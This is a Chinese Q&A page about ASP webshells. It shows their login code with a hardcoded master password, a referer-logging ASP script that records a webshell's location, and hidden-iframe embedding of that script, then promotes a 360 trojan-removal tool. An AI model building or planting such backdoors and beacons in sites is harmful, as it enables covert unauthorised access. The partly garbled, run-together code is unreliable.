通常加了的为2113了隐秘性,都密!所以5261首先我们要密4102 asp木马解密工具解密后先检查1653有无万能密码,也就是说就算你改了木马的密码,他也能用这个密码来登录正常的:EnD fUNCtIONIF SEssIoN("web2a2dmin")<>UsERpaSs thEnIF requeSt.FoRM("pass")<>"" TheNiF REquesT.foRM("pass")=uSERPASS ThenSEsSIoN("web2a2dmin")=uSERPAssrESPOnsE.rEdirEct UrlELserrs"对不起,密码验证失败!"加有万能密码的:EnD fUNCtIONIF SEssIoN("web2a2dmin")<>UsERpaSs thEnIF requeSt.FoRM("pass")<>"" TheNiF REquesT.foRM("pass")=uSERPASS or request.form("pass")="1111111" ThenSEsSIoN("web2a2dmin")=uSERPAssrESPOnsE.rEdirEct UrlELserrs"对不起,密码验证失败!"1111111就是传说中的万能密码了。找到万能密码代码后把or request.form("pass")="1111111" 删除就OK了!下面来找马大多数都喜欢用框架挂马:找到后删了,到此asp后门就算剔除了!下面教大家后门的原理:这是一段收信的asp代码将其保存为1.asp<%url=Request.ServerVariables("HTTP_Referer")set fs=server.CreateObject("Scripting.FileSystemObject")set file=fs.OpenTextFile(server.MapPath("bobo.txt"),8,True)file.writeline urlfile.closeset file=nothingset fs=nothing%>代码基本意思就是:“HTTP_REFERER” 链接到当前页面的前一页面的 URL 地址简单来说就是获得webshell的地址然后记录在bobo.txt这里文本里上传到空间比如 http://127.0.0.1/1.asp然后里用http://127.0.0.1/1.asp width=0 height=0>插到asp木马中那么别人访问这个被挂了马的asp木马就会生成个bobo.txt里面就会有asp大马的路径了

  你用360顽固大具;地址: http://www.360.com/ 我简单的给你说一下 360顽固木马专杀大全的功能;为您提供“一站式”解决木马方法,最快最全解决系统诸多问题。如果360安全卫士无法安装、运行,系统中已感染木马、病毒,或者系统出现不正常状况,建议您下载360顽固木马专杀大全使用!专杀大全由360安全卫士出品,提供如下功能: 1.顽固型木马查杀及部分感染型木马感染文件的修复 可查杀机器狗、U盘病毒、磁碟机等数十种顽固型木马 修复360安全卫士及360保险箱 建议您在断网或者安全模式下使用专杀大全,效果会更佳(开机后按F8可选择进入安全模式) 2.流行木马免疫:提供有host免疫、文件免疫、开机免疫三类免疫功能; host免疫:通过在host表中添加对挂马网站的屏蔽,切断木马入侵源头; 文件免疫:通过免疫文件使木马病毒下载后无法成功创建; <3.修复:与360安全卫士IE修复功能一致,对被篡改和被破坏的IE相关设置进行修复。4.漏洞:调用360安全卫士最强主动防御类功能,对系统进行全面检测。更新内容:升级dummycom专杀。360顽固木马专杀大全包含如下工具:360安全卫士修复工具;360安全卫士诊断工具;最新机器狗木马专杀工具;最新dummycom病毒专杀工具;最新各类流行木马专杀。   海端asp木马有

 
目前共有0条评论
  • 暂无Trackback
你目前的身份是游客,评论请输入昵称和电邮!